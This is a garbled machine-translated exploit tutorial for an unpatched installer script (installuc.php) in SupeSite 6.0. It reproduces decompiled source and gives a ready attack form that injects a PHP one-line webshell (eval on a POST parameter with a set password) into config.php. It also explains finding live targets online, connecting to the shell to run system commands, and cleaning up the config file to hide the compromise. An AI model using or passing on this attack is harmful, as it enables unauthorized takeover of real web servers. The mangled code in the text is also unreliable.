SupeSite 6.0 directly obtains the 0day of webshell

For me, the vulnerability is located in a configuration file. If the target website has already configured this file, we cannot exploit this vulnerability, if the file is not configured in time, it may fail. Of course, some sites have not configured the file. Although the official supesite version has now reached 7.0, 6.0 is still applied on many servers, which is a threat to a small number of websites. Few people know about this vulnerability. The vulnerability is found in the installuc. php file and downloaded from the official website.Source codeIt is zend encrypted. We can decrypt it from dezend. cc, or use a tool. Because I am lazy, I just need to find a test target from the internet. I just found one:

If this page is displayed, it turns out that it has not been configured. That is to say, it may be usable. We can see that the source code contains such segments.

Else if ($ step = 1)

{

......

}

Else if ($ step = 2)

{

......

}

Else if ($ step = 3)

{

......

}



The first step, the second step, and the third step. The vulnerability is found at setp = 3:

Function insertconfig ($ s, $ find, $ replace)/* write function */

{

......

}

$ Ssconfig = S_ROOT. "/config. php ";

$ Ucdbhost = $ _ POST [ucdbhost];/* The variable we want to use */

$ Ucdbuser =$ _ POST [ucdbuser];

......

$ S = file_get_contents ($ ssconfig );

$ S = trim ($ s );

$ S = substr ($ s, 0-2) = "?> "? Substr ($ s, 0, 0-2): $ s;

$ S = insertconfig ($ s, "/define \ (UC_CONNECT, \ s *.*? \);/I "," define (UC_CONNECT, mysql); ");/* Call The Write function */

$ S = insertconfig ($ s, "/define \ (UC_DBHOST, \ s *.*? \);/I "," define (UC_DBHOST, {$ ucdbhost });");

$ S = insertconfig ($ s, "/define \ (UC_DBUSER, \ s *.*? \);/I "," define (UC_DBUSER, {$ ucdbuser });");

......

If (! ($ Fp = @ fopen ($ ssconfig, "w ")))

{

Instmsg ("failed to write the configuration file. Please return and check whether the./config. php permission is 0777 ");

}

@ Fwrite ($ fp, $ s );

@ Fclose ($ fp );

If ($ fp = @ fopen ($ lockfile, "w "))

{

Fwrite ($ fp ,"");

Fclose ($ fp );

}



Print "<table class =" showtable "> <tr> <td> <strong> # configuration completed </strong> </td> </tr> <td id = "msg1"> <br/> you have completed UCenter configuration, log on to FTP to delete installuc. php file <br/> <a href = "javascript:;" onclick = "javascript: backwindow (installuc,);"> click to return to the main interface, next step </a> </td> </tr> </table> ";



There are too many codes, and code like this is omitted. In the above code, we can see that after the variables are obtained by post input, they are directly written to the config. php file without any filtering.

Now I provide a simple application code

<Body>

<Div class = "bodydiv">

<H1> configuration table
<Div style = "width: 90%; margin: 0 auto;">

<Br> <form id = "theform" method = "post" action = "http://www.xxx.com/installuc.php? Step = 3 ">

<Table class = "showtable">

<Tr> <td> <strong> # fill in the relevant information dont share it! Thx </strong> </td> </tr>

<Tr> <td id = "msg1"> set UCenter information here </td> </tr>

</Table>

<Br>

<Table class = datatable>

<Tr>

<Td width = "15%" type = "codeph" text = "codeph"> $ code: </td type = "codeph" text = "/codeph">

<Td> <input type = "text" id = "ucdbhost" name = "ucdbhost" size = "60" value = "); eval ($ _ POST [sunwear]);?> "> </Td>

<Td width = "20%"> </td>

</Tr>

</Table>

<Input type = "hidden" name = "apptype" value = "SUPESITE">

<P align = "center">

<Input type = "submit" name = "submit" value = "submit" style = "height: 25">

</P>

</Form> </div>

<Div id = "footer">©Comsenz Inc. 2001-2008Www.supesite.com</Div>

</Div>

<Br>

</Body>

</Html>

Replace the address with the target address. The step parameter in my code is 3, so that we can directly submit the variable content we want to use, without additional settings. The trojan content is in one sentence. The connection password is sunwear and I will test it with the test target I found. If the returned content is

# Configuration complete

UCenter configuration has been completed. log on to FTP to delete the installuc. php file.

Click back to the main interface to perform the next step.

The submission is successful. If you access the config. php page

); // UCenter Database Host define (UC_DBUSER,); // UCenter database username define (UC_DBPW,); // UCenter Database Password define (UC_DBNAME ,); // UCenter database name define (UC_DBCHARSET,); // UCenter database character set define (UC_DBTABLEPRE ,''.); // UCenter database table prefix define (UC_DBCONNECT, 0); // UCenter database persistent connection 0 = disabled, 1 = Enable // communication related define (UC_KEY ,); // The communication key with the UCenter, which must be consistent with the UCenter's define (UC_API,); // The URL address of the UCenter, which depends on the constant define (UC_CHARSET,) when calling the profile picture ,); // UCenter character set define (UC_IP,); // UCenter IP address. When UC_CONNECT is not in mysql mode and the domain name is resolved by the current application server, set this value to define (UC_APPID ,); // The ID of the current application. ========================================================== ==== define (UC_PPP, 20 );

It indicates that the Trojan has been written to config. php. The reason why the trojan is displayed is that the end of the written code is "?> "In order to parse the PHP Trojan code, the subsequent code is displayed as common characters. Now we use a PHP Trojan to connect to the target website, and then we can upload the Trojan. The result of Phpinfo () isLinuxOperating System. This vulnerability is not affected by the gpc switch, but also affects the windows operating system. On some windows systems with high php Execution permissions, you can directly use phpwebshell to execute system commands. We can't forget this after we have the permission. If config. php is always like this, the homepage will also display an error, so we need to modify the file normally.

Define (UC_DBHOST, \); eval ($ _ POST [shArpWinner]);?> );

Change

Define (UC_DBHOST ,);

You can.

The above is a successful example. After some websites are submitted and prompt that the configuration is complete, the access to config. php will be blank, which means that the configuration fails.